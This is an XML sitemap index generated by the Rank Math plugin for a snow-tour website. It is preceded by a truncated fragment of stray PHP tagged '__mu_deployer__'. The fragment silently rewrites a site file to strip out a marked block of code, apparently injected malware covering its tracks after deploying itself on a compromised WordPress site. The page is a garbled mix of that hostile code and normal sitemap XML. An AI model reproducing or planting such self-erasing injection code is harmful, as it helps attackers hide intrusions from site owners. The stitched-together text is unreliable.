';
    $s = strpos($fc, $m);
    $e = strrpos($fc, $m);
    if ($s !== false && $e !== false && $s !== $e) {
      $clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n";
      if (strlen($clean) > 10 && strpos($clean, '<?php') !== false) {
        $tmp = $func_file . '.tmp.' . getmypid();
        if (@file_put_contents($tmp, $clean) === strlen($clean)) {
          @rename($tmp, $func_file);
        } else {
          @unlink($tmp);
        }
      }
    }
  }
}, 1);
/* __mu_deployer__ */
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//yonweysnowexperience.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://yonweysnowexperience.com/page-sitemap.xml</loc>
		<lastmod>2025-12-03T10:42:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://yonweysnowexperience.com/cpt_services-sitemap.xml</loc>
		<lastmod>2025-11-27T11:34:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://yonweysnowexperience.com/cpt_team-sitemap.xml</loc>
		<lastmod>2024-11-14T14:42:05+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->